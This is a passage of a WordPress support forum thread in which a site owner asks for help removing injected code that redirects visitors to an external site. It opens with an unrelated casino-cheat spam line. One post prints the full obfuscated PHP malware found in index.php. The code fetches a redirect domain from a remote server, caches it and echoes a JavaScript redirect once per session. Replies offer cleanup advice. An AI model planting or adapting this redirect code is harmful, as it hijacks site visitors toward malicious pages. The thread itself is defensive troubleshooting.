Super ace slot cheat android.REGISTER NOW GET FREE 888 PESOS REWARDS!

Resolved kirai
(@kirai)

6 years, 8 months ago

It seems there is some code inserted somewhere… it randomly redirects users to an external website, but it does it only one time per session.

redirects to external website but https://www.a works. Clicking on the top menu links also redirects to external webiste

The page I need help with: [log in to see the link]

Viewing 9 replies - 16 through 24 (of 24 total)

← 1 2

afleetingglimpse
(@afleetingglimpse)

6 years, 7 months ago
I assume the codes target has changed.

did you check if the prior code is still the same code as before?
The delay tells me it was trying but was hitting the wall you put up by blocking the sites and IP’s.

If the code has not changed and it got replaced, something is still reaching out.
FTP or RDP maybe after a set time.

check the code and see if it changed.

I learn every time I Dig.
roi 777.com seems to kick to kuhjgtfreda(dot)tk

block ht tp:/ /front steps(dot)tk”
I would install ip2location or similar and block the .tk country.

you can try in htaccess adding this where you had the IP strings.

Order Deny,Allow
Deny from .tk

You may just have to buy wordfence premium, use the country blocking and then maybe hire them to clean the site.

I am learning as I go with this and a few other places have had the same issue as you.
- This reply was modified 6 years, 7 months ago by afleetingglimpse.
afleetingglimpse
(@afleetingglimpse)

6 years, 7 months ago

from other reports on this issue, it spawns a web page call that opens to the infected site.

afleetingglimpse
(@afleetingglimpse)

6 years, 7 months ago

I have no idea if the server application is running on has a web browser installed, but if it does.. and that is beyond my knowledge, all that would need to be done is a single install of the browser homepage as the virus site and it opening and closing the browser. on a built in trigger/time/cookie.

again block .tk and clear the code. see what happens.

Thread Starter kirai
(@kirai)

6 years, 7 months ago

I even change the permissions of the index file to 444 and it changes to 644 and the code is inserted.
Thread Starter kirai
(@kirai)

6 years, 7 months ago
This is the new code, how to I know the target when new code is inserted?
```
 $id6fe1d0be634 = "/index/?2601510941471";
$z8c7dd922ad47=md5($id6fe1d0be634);$u77e8e1445762=time();$geaa082fa5781=filemtime($z8c7dd922ad47);$u07cc694b9b3f=$u77e8e1445762-$geaa082fa5781;if(file_exists($z8c7dd922ad47)){$fe1260894f59e=@fopen($z8c7dd922ad47,base64_decode('cg=='));$xe4e46deb7f9c=json_decode(base64_decode(fread($fe1260894f59e,filesize($z8c7dd922ad47))),1);fclose($fe1260894f59e);}if($u07cc694b9b3f>=60 ||!file_exists($z8c7dd922ad47)){$v9b207167e538=getDDroi($z8c7dd922ad47);if($v9b207167e538[base64_decode('ZG9tYWlu')]){$je617ef6974fa=base64_decode('aHR0cDovLw==').$v9b207167e538[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}else{$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcnNydg=='));curl_setopt($wd88fc6edf21e,CURLOPT_URL,$xe4e46deb7f9c[base64_decode('cnNydg==')]);curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sad5f82e879a9=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$je617ef6974fa=base64_decode('aHR0cDovLw==').$sad5f82e879a9.$id6fe1d0be634;}}else{$je617ef6974fa=base64_decode('aHR0cDovLw==').$xe4e46deb7f9c[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}function getDDroi($z8c7dd922ad47){$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcm9p'));curl_setopt($wd88fc6edf21e,CURLOPT_URL,base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sb4a88417b3d0=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$xe4e46deb7f9c=json_decode($sb4a88417b3d0,true);if($xe4e46deb7f9c[base64_decode('ZG9tYWlu')]){$y0666f0acdeed=@fopen($z8c7dd922ad47,base64_decode('dys='));@fwrite($y0666f0acdeed,base64_encode($sb4a88417b3d0));@fclose($y0666f0acdeed);return $xe4e46deb7f9c;}else return false;}if(!$_COOKIE[base64_decode('YTc3N2Q=')]){setcookie(base64_decode('YTc3N2Q='),1,time()+43200,base64_decode('Lw=='));echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi').$je617ef6974fa.base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi').$je617ef6974fa.base64_decode('Ijs8L3NjcmlwdD4=');}
```
Thread Starter kirai
(@kirai)

6 years, 7 months ago

Thank you always afleetingglimpse !

I’ve blocked all .tk and I’m going to look into wordfence premium.
afleetingglimpse
(@afleetingglimpse)

6 years, 7 months ago
tried the prvention vs php injection I posted and it locked my site.

undid it.. and I am back in.. so that code failed and caused a error 500 ??
- This reply was modified 6 years, 7 months ago by afleetingglimpse.
ragnew
(@ragnew)

6 years, 7 months ago

The bad guys may have uploaded a hidden shell file somewhere that allows them to have access and alter your site they have uploaded a script when accessed alters your index.php file.

It could be buried anywhere.

Do you only have one one instance of wordpress?

Best not to have multiple instances on the same account.

Here is a simple hacked site tutorial that I did.
https://www.computer-geek.net/how-to-fix-your-hacked-wo-va-65.html

Thread Starter kirai
(@kirai)

6 years, 6 months ago

Thank you all, I moved to a new server, problem solved ?? But it seems blocking all .tk solved the problem also.